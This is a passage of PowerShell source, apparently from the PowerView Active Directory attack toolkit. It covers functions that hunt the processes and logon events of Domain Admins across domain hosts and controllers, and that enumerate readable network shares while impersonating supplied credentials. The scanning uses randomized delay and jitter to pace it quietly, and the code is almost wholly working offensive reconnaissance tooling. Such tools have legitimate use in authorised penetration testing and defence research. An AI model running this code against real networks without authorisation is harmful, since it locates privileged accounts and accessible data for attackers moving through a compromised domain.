'[Find-DomainProcess] Querying computers in the domain'\n            $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname\n        }\n        Write-Verbose \"[Find-DomainProcess] TargetComputers length: $($TargetComputers.Length)\"\n        if ($TargetComputers.Length -eq 0) {\n            throw '[Find-DomainProcess] No hosts found to enumerate'\n        }\n\n        # now build the user target set\n        if ($PSBoundParameters['ProcessName']) {\n            $TargetProcessName = @()\n            ForEach ($T in $ProcessName) {\n                $TargetProcessName += $T.Split(',')\n            }\n            if ($TargetProcessName -isnot [System.Array]) {\n                $TargetProcessName = [String[]] @($TargetProcessName)\n            }\n        }\n        elseif ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount'] -or $PSBoundParameters['UserAllowDelegation']) {\n            $TargetUsers = Get-DomainUser @UserSearcherArguments | Select-Object -ExpandProperty samaccountname\n        }\n        else {\n            $GroupSearcherArguments = @{\n                'Identity' = $UserGroupIdentity\n                'Recurse' = $True\n            }\n            if ($PSBoundParameters['UserDomain']) { $GroupSearcherArguments['Domain'] = $UserDomain }\n            if ($PSBoundParameters['UserSearchBase']) { $GroupSearcherArguments['SearchBase'] = $UserSearchBase }\n            if ($PSBoundParameters['Server']) { $GroupSearcherArguments['Server'] = $Server }\n            if ($PSBoundParameters['SearchScope']) { $GroupSearcherArguments['SearchScope'] = $SearchScope }\n            if ($PSBoundParameters['ResultPageSize']) { $GroupSearcherArguments['ResultPageSize'] = $ResultPageSize }\n            if ($PSBoundParameters['ServerTimeLimit']) { $GroupSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n            if ($PSBoundParameters['Tombstone']) { $GroupSearcherArguments['Tombstone'] = $Tombstone }\n            if ($PSBoundParameters['Credential']) { $GroupSearcherArguments['Credential'] = $Credential }\n            $GroupSearcherArguments\n            $TargetUsers = Get-DomainGroupMember @GroupSearcherArguments | Select-Object -ExpandProperty MemberName\n        }\n\n        # the host enumeration block we're using to enumerate all servers\n        $HostEnumBlock = {\n            Param($ComputerName, $ProcessName, $TargetUsers, $Credential)\n\n            ForEach ($TargetComputer in $ComputerName) {\n                $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer\n                if ($Up) {\n                    # try to enumerate all active processes on the remote host\n                    # and search for a specific process name\n                    if ($Credential) {\n                        $Processes = Get-WMIProcess -Credential $Credential -ComputerName $TargetComputer -ErrorAction SilentlyContinue\n                    }\n                    else {\n                        $Processes = Get-WMIProcess -ComputerName $TargetComputer -ErrorAction SilentlyContinue\n                    }\n                    ForEach ($Process in $Processes) {\n                        # if we're hunting for a process name or comma-separated names\n                        if ($ProcessName) {\n                            if ($ProcessName -Contains $Process.ProcessName) {\n                                $Process\n                            }\n                        }\n                        # if the session user is in the target list, display some output\n                        elseif ($TargetUsers -Contains $Process.User) {\n                            $Process\n                        }\n                    }\n                }\n            }\n        }\n    }\n\n    PROCESS {\n        # only ignore threading if -Delay is passed\n        if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {\n\n            Write-Verbose \"[Find-DomainProcess] Total number of hosts: $($TargetComputers.count)\"\n            Write-Verbose \"[Find-DomainProcess] Delay: $Delay, Jitter: $Jitter\"\n            $Counter = 0\n            $RandNo = New-Object System.Random\n\n            ForEach ($TargetComputer in $TargetComputers) {\n                $Counter = $Counter + 1\n\n                # sleep for our semi-randomized interval\n                Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)\n\n                Write-Verbose \"[Find-DomainProcess] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))\"\n                $Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $TargetProcessName, $TargetUsers, $Credential\n                $Result\n\n                if ($Result -and $StopOnSuccess) {\n                    Write-Verbose \"[Find-DomainProcess] Target user found, returning early\"\n                    return\n                }\n            }\n        }\n        else {\n            Write-Verbose \"[Find-DomainProcess] Using threading with threads: $Threads\"\n\n            # if we're using threading, kick off the script block with New-ThreadedFunction\n            $ScriptParams = @{\n                'ProcessName' = $TargetProcessName\n                'TargetUsers' = $TargetUsers\n                'Credential' = $Credential\n            }\n\n            # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params\n            New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads\n        }\n    }\n}\n\n\nfunction Find-DomainUserEvent {\n<#\n.SYNOPSIS\n\nFinds logon events on the current (or remote domain) for the specified users.\n\nAuthor: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainUser, Get-DomainGroupMember, Get-DomainController, Get-DomainUserEvent, New-ThreadedFunction  \n\n.DESCRIPTION\n\nEnumerates all domain controllers from the specified -Domain\n(default of the local domain) using Get-DomainController, enumerates\nthe logon events for each using Get-DomainUserEvent, and filters\nthe results based on the targeting criteria.\n\n.PARAMETER ComputerName\n\nSpecifies an explicit computer name to retrieve events from.\n\n.PARAMETER Domain\n\nSpecifies a domain to query for domain controllers to enumerate.\nDefaults to the current domain.\n\n.PARAMETER Filter\n\nA hashtable of PowerView.LogonEvent properties to filter for.\nThe 'op|operator|operation' clause can have '&', '|', 'and', or 'or',\nand is 'or' by default, meaning at least one clause matches instead of all.\nSee the exaples for usage.\n\n.PARAMETER StartTime\n\nThe [DateTime] object representing the start of when to collect events.\nDefault of [DateTime]::Now.AddDays(-1).\n\n.PARAMETER EndTime\n\nThe [DateTime] object representing the end of when to collect events.\nDefault of [DateTime]::Now.\n\n.PARAMETER MaxEvents\n\nThe maximum number of events (per host) to retrieve. Default of 5000.\n\n.PARAMETER UserIdentity\n\nSpecifies one or more user identities to search for.\n\n.PARAMETER UserDomain\n\nSpecifies the domain to query for users to search for, defaults to the current domain.\n\n.PARAMETER UserLDAPFilter\n\nSpecifies an LDAP query string that is used to search for target users.\n\n.PARAMETER UserSearchBase\n\nSpecifies the LDAP source to search through for target users.\ne.g. \"LDAP://OU=secret,DC=testlab,DC=local\". Useful for OU queries.\n\n.PARAMETER UserGroupIdentity\n\nSpecifies a group identity to query for target users, defaults to 'Domain Admins.\nIf any other user specifications are set, then UserGroupIdentity is ignored.\n\n.PARAMETER UserAdminCount\n\nSwitch. Search for users users with '(adminCount=1)' (meaning are/were privileged).\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target computer(s).\n\n.PARAMETER StopOnSuccess\n\nSwitch. Stop hunting after finding after finding a target user.\n\n.PARAMETER Delay\n\nSpecifies the delay (in seconds) between enumerating hosts, defaults to 0.\n\n.PARAMETER Jitter\n\nSpecifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3\n\n.PARAMETER Threads\n\nThe number of threads to use for user searching, defaults to 20.\n\n.EXAMPLE\n\nFind-DomainUserEvent\n\nSearch for any user events matching domain admins on every DC in the current domain.\n\n.EXAMPLE\n\n$cred = Get-Credential dev\\administrator\nFind-DomainUserEvent -ComputerName 'secondary.dev.testlab.local' -UserIdentity 'john'\n\nSearch for any user events matching the user 'john' on the 'secondary.dev.testlab.local'\ndomain controller using the alternate credential\n\n.EXAMPLE\n\n'primary.testlab.local | Find-DomainUserEvent -Filter @{'IpAddress'='192.168.52.200|192.168.52.201'}\n\nFind user events on the primary.testlab.local system where the event matches\nthe IPAddress '192.168.52.200' or '192.168.52.201'.\n\n.EXAMPLE\n\n$cred = Get-Credential testlab\\administrator\nFind-DomainUserEvent -Delay 1 -Filter @{'LogonGuid'='b8458aa9-b36e-eaa1-96e0-4551000fdb19'; 'TargetLogonId' = '10238128'; 'op'='&'}\n\nFind user events mathing the specified GUID AND the specified TargetLogonId, searching\nthrough every domain controller in the current domain, enumerating each DC in serial\ninstead of in a threaded manner, using the alternate credential.\n\n.OUTPUTS\n\nPowerView.LogonEvent\n\nPowerView.ExplicitCredentialLogon\n\n.LINK\n\nhttp://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUsePSCredentialType', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')]\n    [OutputType('PowerView.LogonEvent')]\n    [OutputType('PowerView.ExplicitCredentialLogon')]\n    [CmdletBinding(DefaultParameterSetName = 'Domain')]\n    Param(\n        [Parameter(ParameterSetName = 'ComputerName', Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('dnshostname', 'HostName', 'name')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $ComputerName,\n\n        [Parameter(ParameterSetName = 'Domain')]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Hashtable]\n        $Filter,\n\n        [Parameter(ValueFromPipelineByPropertyName = $True)]\n        [ValidateNotNullOrEmpty()]\n        [DateTime]\n        $StartTime = [DateTime]::Now.AddDays(-1),\n\n        [Parameter(ValueFromPipelineByPropertyName = $True)]\n        [ValidateNotNullOrEmpty()]\n        [DateTime]\n        $EndTime = [DateTime]::Now,\n\n        [ValidateRange(1, 1000000)]\n        [Int]\n        $MaxEvents = 5000,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $UserIdentity,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $UserDomain,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $UserLDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $UserSearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('GroupName', 'Group')]\n        [String[]]\n        $UserGroupIdentity = 'Domain Admins',\n\n        [Alias('AdminCount')]\n        [Switch]\n        $UserAdminCount,\n\n        [Switch]\n        $CheckAccess,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $StopOnSuccess,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $Delay = 0,\n\n        [ValidateRange(0.0, 1.0)]\n        [Double]\n        $Jitter = .3,\n\n        [Int]\n        [ValidateRange(1, 100)]\n        $Threads = 20\n    )\n\n    BEGIN {\n        $UserSearcherArguments = @{\n            'Properties' = 'samaccountname'\n        }\n        if ($PSBoundParameters['UserIdentity']) { $UserSearcherArguments['Identity'] = $UserIdentity }\n        if ($PSBoundParameters['UserDomain']) { $UserSearcherArguments['Domain'] = $UserDomain }\n        if ($PSBoundParameters['UserLDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $UserLDAPFilter }\n        if ($PSBoundParameters['UserSearchBase']) { $UserSearcherArguments['SearchBase'] = $UserSearchBase }\n        if ($PSBoundParameters['UserAdminCount']) { $UserSearcherArguments['AdminCount'] = $UserAdminCount }\n        if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential }\n\n        if ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount']) {\n            $TargetUsers = Get-DomainUser @UserSearcherArguments | Select-Object -ExpandProperty samaccountname\n        }\n        elseif ($PSBoundParameters['UserGroupIdentity'] -or (-not $PSBoundParameters['Filter'])) {\n            # otherwise we're querying a specific group\n            $GroupSearcherArguments = @{\n                'Identity' = $UserGroupIdentity\n                'Recurse' = $True\n            }\n            Write-Verbose \"UserGroupIdentity: $UserGroupIdentity\"\n            if ($PSBoundParameters['UserDomain']) { $GroupSearcherArguments['Domain'] = $UserDomain }\n            if ($PSBoundParameters['UserSearchBase']) { $GroupSearcherArguments['SearchBase'] = $UserSearchBase }\n            if ($PSBoundParameters['Server']) { $GroupSearcherArguments['Server'] = $Server }\n            if ($PSBoundParameters['SearchScope']) { $GroupSearcherArguments['SearchScope'] = $SearchScope }\n            if ($PSBoundParameters['ResultPageSize']) { $GroupSearcherArguments['ResultPageSize'] = $ResultPageSize }\n            if ($PSBoundParameters['ServerTimeLimit']) { $GroupSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n            if ($PSBoundParameters['Tombstone']) { $GroupSearcherArguments['Tombstone'] = $Tombstone }\n            if ($PSBoundParameters['Credential']) { $GroupSearcherArguments['Credential'] = $Credential }\n            $TargetUsers = Get-DomainGroupMember @GroupSearcherArguments | Select-Object -ExpandProperty MemberName\n        }\n\n        # build the set of computers to enumerate\n        if ($PSBoundParameters['ComputerName']) {\n            $TargetComputers = $ComputerName\n        }\n        else {\n            # if not -ComputerName is passed, query the current (or target) domain for domain controllers\n            $DCSearcherArguments = @{\n                'LDAP' = $True\n            }\n            if ($PSBoundParameters['Domain']) { $DCSearcherArguments['Domain'] = $Domain }\n            if ($PSBoundParameters['Server']) { $DCSearcherArguments['Server'] = $Server }\n            if ($PSBoundParameters['Credential']) { $DCSearcherArguments['Credential'] = $Credential }\n            Write-Verbose \"[Find-DomainUserEvent] Querying for domain controllers in domain: $Domain\"\n            $TargetComputers = Get-DomainController @DCSearcherArguments | Select-Object -ExpandProperty dnshostname\n        }\n        if ($TargetComputers -and ($TargetComputers -isnot [System.Array])) {\n            $TargetComputers = @(,$TargetComputers)\n        }\n        Write-Verbose \"[Find-DomainUserEvent] TargetComputers length: $($TargetComputers.Length)\"\n        Write-Verbose \"[Find-DomainUserEvent] TargetComputers $TargetComputers\"\n        if ($TargetComputers.Length -eq 0) {\n            throw '[Find-DomainUserEvent] No hosts found to enumerate'\n        }\n\n        # the host enumeration block we're using to enumerate all servers\n        $HostEnumBlock = {\n            Param($ComputerName, $StartTime, $EndTime, $MaxEvents, $TargetUsers, $Filter, $Credential)\n\n            ForEach ($TargetComputer in $ComputerName) {\n                $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer\n                if ($Up) {\n                    $DomainUserEventArgs = @{\n                        'ComputerName' = $TargetComputer\n                    }\n                    if ($StartTime) { $DomainUserEventArgs['StartTime'] = $StartTime }\n                    if ($EndTime) { $DomainUserEventArgs['EndTime'] = $EndTime }\n                    if ($MaxEvents) { $DomainUserEventArgs['MaxEvents'] = $MaxEvents }\n                    if ($Credential) { $DomainUserEventArgs['Credential'] = $Credential }\n                    if ($Filter -or $TargetUsers) {\n                        if ($TargetUsers) {\n                            Get-DomainUserEvent @DomainUserEventArgs | Where-Object {$TargetUsers -contains $_.TargetUserName}\n                        }\n                        else {\n                            $Operator = 'or'\n                            $Filter.Keys | ForEach-Object {\n                                if (($_ -eq 'Op') -or ($_ -eq 'Operator') -or ($_ -eq 'Operation')) {\n                                    if (($Filter[$_] -match '&') -or ($Filter[$_] -eq 'and')) {\n                                        $Operator = 'and'\n                                    }\n                                }\n                            }\n                            $Keys = $Filter.Keys | Where-Object {($_ -ne 'Op') -and ($_ -ne 'Operator') -and ($_ -ne 'Operation')}\n                            Get-DomainUserEvent @DomainUserEventArgs | ForEach-Object {\n                                if ($Operator -eq 'or') {\n                                    ForEach ($Key in $Keys) {\n                                        if ($_.\"$Key\" -match $Filter[$Key]) {\n                                            $_\n                                        }\n                                    }\n                                }\n                                else {\n                                    # and all clauses\n                                    ForEach ($Key in $Keys) {\n                                        if ($_.\"$Key\" -notmatch $Filter[$Key]) {\n                                            break\n                                        }\n                                        $_\n                                    }\n                                }\n                            }\n                        }\n                    }\n                    else {\n                        Get-DomainUserEvent @DomainUserEventArgs\n                    }\n                }\n            }\n        }\n    }\n\n    PROCESS {\n        # only ignore threading if -Delay is passed\n        if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {\n\n            Write-Verbose \"[Find-DomainUserEvent] Total number of hosts: $($TargetComputers.count)\"\n            Write-Verbose \"[Find-DomainUserEvent] Delay: $Delay, Jitter: $Jitter\"\n            $Counter = 0\n            $RandNo = New-Object System.Random\n\n            ForEach ($TargetComputer in $TargetComputers) {\n                $Counter = $Counter + 1\n\n                # sleep for our semi-randomized interval\n                Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)\n\n                Write-Verbose \"[Find-DomainUserEvent] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))\"\n                $Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $StartTime, $EndTime, $MaxEvents, $TargetUsers, $Filter, $Credential\n                $Result\n\n                if ($Result -and $StopOnSuccess) {\n                    Write-Verbose \"[Find-DomainUserEvent] Target user found, returning early\"\n                    return\n                }\n            }\n        }\n        else {\n            Write-Verbose \"[Find-DomainUserEvent] Using threading with threads: $Threads\"\n\n            # if we're using threading, kick off the script block with New-ThreadedFunction\n            $ScriptParams = @{\n                'StartTime' = $StartTime\n                'EndTime' = $EndTime\n                'MaxEvents' = $MaxEvents\n                'TargetUsers' = $TargetUsers\n                'Filter' = $Filter\n                'Credential' = $Credential\n            }\n\n            # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params\n            New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads\n        }\n    }\n}\n\n\nfunction Find-DomainShare {\n<#\n.SYNOPSIS\n\nSearches for computer shares on the domain. If -CheckShareAccess is passed,\nthen only shares the current user has read access to are returned.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, New-ThreadedFunction  \n\n.DESCRIPTION\n\nThis function enumerates all machines on the current (or specified) domain\nusing Get-DomainComputer, and enumerates the available shares for each\nmachine with Get-NetShare. If -CheckShareAccess is passed, then\n[IO.Directory]::GetFiles() is used to check if the current user has read\naccess to the given share. If -Credential is passed, then\nInvoke-UserImpersonation is used to impersonate the specified user before\nenumeration, reverting after with Invoke-RevertToSelf.\n\n.PARAMETER ComputerName\n\nSpecifies an array of one or more hosts to enumerate, passable on the pipeline.\nIf -ComputerName is not passed, the default behavior is to enumerate all machines\nin the domain returned by Get-DomainComputer.\n\n.PARAMETER ComputerDomain\n\nSpecifies the domain to query for computers, defaults to the current domain.\n\n.PARAMETER ComputerLDAPFilter\n\nSpecifies an LDAP query string that is used to search for computer objects.\n\n.PARAMETER ComputerSearchBase\n\nSpecifies the LDAP source to search through for computers,\ne.g. \"LDAP://OU=secret,DC=testlab,DC=local\". Useful for OU queries.\n\n.PARAMETER ComputerOperatingSystem\n\nSearch computers with a specific operating system, wildcards accepted.\n\n.PARAMETER ComputerServicePack\n\nSearch computers with a specific service pack, wildcards accepted.\n\n.PARAMETER ComputerSiteName\n\nSearch computers in the specific AD Site name, wildcards accepted.\n\n.PARAMETER CheckShareAccess\n\nSwitch. Only display found shares that the local user has access to.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain and target systems.\n\n.PARAMETER Delay\n\nSpecifies the delay (in seconds) between enumerating hosts, defaults to 0.\n\n.PARAMETER Jitter\n\nSpecifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3\n\n.PARAMETER Threads\n\nThe number of threads to use for user searching, defaults to 20.\n\n.EXAMPLE\n\nFind-DomainShare\n\nFind all domain shares in the current domain.\n\n.EXAMPLE\n\nFind-DomainShare -CheckShareAccess\n\nFind all domain shares in the current domain that the current user has\nread access to.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nFind-DomainShare -Domain testlab.local -Credential $Cred\n\nSearches for domain shares in the testlab.local domain using the specified alternate credentials.\n\n.OUTPUTS\n\nPowerView.ShareInfo\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.ShareInfo')]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DNSHostName')]\n        [String[]]\n        $ComputerName,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Domain')]\n        [String]\n        $ComputerDomain,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $ComputerLDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $ComputerSearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('OperatingSystem')]\n        [String]\n        $ComputerOperatingSystem,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ServicePack')]\n        [String]\n        $ComputerServicePack,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('SiteName')]\n        [String]\n        $ComputerSiteName,\n\n        [Alias('CheckAccess')]\n        [Switch]\n        $CheckShareAccess,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $Delay = 0,\n\n        [ValidateRange(0.0, 1.0)]\n        [Double]\n        $Jitter = .3,\n\n        [Int]\n        [ValidateRange(1, 100)]\n        $Threads = 20\n    )\n\n    BEGIN {\n\n        $ComputerSearcherArguments = @{\n            'Properties' = 'dnshostname'\n        }\n        if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }\n        if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }\n        if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }\n        if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained }\n        if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }\n        if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }\n        if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }\n        if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }\n\n        if ($PSBoundParameters['ComputerName']) {\n            $TargetComputers = $ComputerName\n        }\n        else {\n            Write-Verbose '[Find-DomainShare] Querying computers in the domain'\n            $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname\n        }\n        Write-Verbose \"[Find-DomainShare] TargetComputers length: $($TargetComputers.Length)\"\n        if ($TargetComputers.Length -eq 0) {\n            throw '[Find-DomainShare] No hosts found to enumerate'\n        }\n\n        # the host enumeration block we're using to enumerate all servers\n        $HostEnumBlock = {\n            Param($ComputerName, $CheckShareAccess, $TokenHandle)\n\n            if ($TokenHandle) {\n                # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation\n                $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet\n            }\n\n            ForEach ($TargetComputer in $ComputerName) {\n                $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer\n                if ($Up) {\n                    # get the shares for this host and check what we find\n                    $Shares = Get-NetShare -ComputerName $TargetComputer\n                    ForEach ($Share in $Shares) {\n                        $ShareName = $Share.Name\n                        # $Remark = $Share.Remark\n                        $Path = '\\\\'+$TargetComputer+'\\'+$ShareName\n\n                        if (($ShareName) -and ($ShareName.trim() -ne '')) {\n                            # see if we want to check access to this share\n                            if ($CheckShareAccess) {\n                                # check if the user has access to this path\n                                try {\n                                    $Null = [IO.Directory]::GetFiles($Path)\n                                    $Share\n                                }\n                                catch {\n                                    Write-Verbose \"Error accessing share path $Path : $_\"\n                                }\n                            }\n                            else {\n                                $Share\n                            }\n                        }\n                    }\n                }\n            }\n\n            if ($TokenHandle) {\n                Invoke-RevertToSelf\n            }\n        }\n\n        $LogonToken = $Null\n        if ($PSBoundParameters['Credential']) {\n            if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {\n                $LogonToken = Invoke-UserImpersonation -Credential $Credential\n            }\n            else {\n                $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet\n            }\n        }\n    }\n\n    PROCESS {\n        # only ignore threading if -Delay is passed\n        if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {\n\n            Write-Verbose \"[Find-DomainShare] Total number of hosts: $($TargetComputers.count)\"\n            Write-Verbose \"[Find-DomainShare] Delay: $Delay, Jitter: $Jitter\"\n            $Counter = 0\n            $RandNo = New-Object System.Random\n\n            ForEach ($TargetComputer in $TargetComputers) {\n                $Counter = $Counter + 1\n\n                # sleep for our semi-randomized interval\n                Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)\n\n                Write-Verbose \"[Find-DomainShare] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))\"\n                Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $CheckShareAccess, $LogonToken\n            }\n        }\n        else {\n            Write-Verbose \"[Find-DomainShare] Using threading with threads: $Threads\"\n\n            # if we're using threading, kick off the script block with New-ThreadedFunction\n            $ScriptParams = @{\n                'CheckShareAccess' = $CheckShareAccess\n                'TokenHandle' = $LogonToken\n            }\n\n            # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params\n            New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads\n        }\n    }\n\n    END {\n        if ($LogonToken) {\n            Invoke-RevertToSelf -TokenHandle $LogonToken\n        }\n    }\n}\n\n\nfunction Find-InterestingDomainShareFile {\n<#\n.SYNOPSIS\n\nSearches for files matching specific criteria on readable shares\nin the domain.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, Find-InterestingFile, New-ThreadedFunction  \n\n.DESCRIPTION\n\nThis function enumerates all machines on the current (or specified) domain\nusing Get-DomainComputer, and enumerates the available shares for each\nmachine with Get-NetShare. It will then use Find-InterestingFile on each\nreadhable share, searching for files marching specific criteria. If -Credential\nis passed, then Invoke-UserImpersonation is used to impersonate the specified\nuser before enumeration, reverting after with Invoke-RevertToSelf.\n\n.PARAMETER ComputerName\n\nSpecifies an array of one or more hosts to enumerate, passable on the pipeline.\nIf -ComputerName is not passed, the default behavior is to enumerate all machines\nin the domain returned by Get-DomainComputer.\n\n.PARAMETER ComputerDomain\n\nSpecifies the domain to query for computers, defaults to the current domain.\n\n.PARAMETER 